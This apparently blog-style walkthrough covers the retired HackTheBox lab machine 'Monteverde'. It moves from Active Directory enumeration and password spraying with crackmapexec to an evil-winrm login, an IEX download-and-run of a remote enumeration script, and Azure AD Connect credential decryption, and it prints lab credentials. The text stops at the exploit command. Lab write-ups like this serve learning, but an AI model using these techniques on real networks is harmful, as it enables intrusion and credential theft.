Monteverde : HTB walkthrough

4 min readJun 14, 2020

Now since the machine has retired it’s time to go through the process to solve it. This was considerably easy machine if you are familiar with windows.

ENUMERATION

Nmap scan revealed the following

So we see we have active directory in this machine. Both the ports report to LDAP. Info : — — — — — — — -

DOMAIN : MEGABANK.LOCAL0
HOST: MONTEVERDE

I was not satisfied with this so did a fullport NMAP scan… A good habbit!!!

Took ages but was worth it. Lots of ports were open. Let’s start with enum.

RPC Enumeration

Connecting via rpcclient works using anonymous login. Rpcclient -U ‘’ 10.10.10.172 -N

Let us save the users and group names to a list users.txt for password cracking attack.Also added Dimitry, Sally , Ray etc for better username list

SMB Enumeration

#Smbclient -U ‘’ -L ////10.10.10.172// — — Anonymous login accepted. — — No workgroup’s available

KERBEROS Enumeration

AS_REP — — not possible , Has no “ Don’t_require_preauth” — — thus AS_REP roasting not possible

PASSWORD CRACKING

Tried hydra but ended with invalid response
Crackmapexec for winrm (5985 port)

root@kali:~/Downloads/htb/Monteverde#crackmapexec winrm 10.10.10.172 -u ~/Downloads/htb/Monteverde/users.txt -p /pass1.txt

This did not work so I tried for the SMB .

root@kali:~/Downloads/htb/Monteverde# crackmapexec smb 10.10.10.172 -u ~/Downloads/htb/Monteverde/users.txt -p pass1.txt

SABatchJobs ;;;;; bad password practices by Developer or SysAdmins

Let’s go back to SMB enumeration and login with credentials

SMB Enumeration with credentials

Username : SABatchJobs Password : SABatchJobs

SYSVOL found with some files , but GptTemp.inf on both policies contained no juicy info

Found users$ share and it contained some interesting info in azure.xml

Active directory credentials — -

Let’s try for kerberoasting and winrm login exploitation.Username : mhope Password : 4n0therD4y@n0th3r$

KERBEROASTING

No entries found. Might be Windows Remote Management works… Try Evil-winrm

EVIL-WinRM — -Windows Remote Management Login

So I tried to first cross check with CrackMapExec to see if winrm is accessible using these credentials.

Great !! Shows pwn3d!. Let’s try to login with evil-winrm

Finally Got USER !!!!!!

PRIVILEGE ESCALATION

First things first — — Tried Windows-exploit-suggester.py , but seems python was not installed on the machine. So went for JAWS enumeration script.

*Evil-WinRM* PS C:\Users\mhope\Desktop> IEX(new-object net.webclient).downloadString(‘http://10.10.14.75:8000/jaws-enum.ps1')

So you see here we share Azure Admin group with AAD_98********* user and ADMINISTRATOR. And the only service running of some interest was AZURE

Azure AD Connect Exploit

https://vbscrub.com/2020/01/14/azure-ad-connect-database-exploit-priv-esc/

“Exploit can get us plain text credentials of whatever AD account is set to use it — — ADMINISTRATOR”

Ok so we have three options

ADSyncDecrypt
ADsyncGather
ADSyncQuery

Out of which ADSyncDecrypt matches all our requirements

We will run our exploit from bin folder of AD Sync dir

You see there is an mcrypt.dll , so when you transfer your AdDecrypt.exe , transfer mcrypt.dll too; else this one will be used and since it has no readable access, this won’t help you crack credentials.

I got a precompiled version here. https://github.com/VbScrub/AdSyncDecrypt/releases. So I transferred AdDecrypt.exe and mcrypt.dll to my writable directory on target machine which was C:/Users/mhope/Desktop. And went to below location and ran command.

C:\Program Files\Microsoft Azure AD Sync\bin

*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\bin> C:\Users\mhope\Desktop\AdDecrypt.exe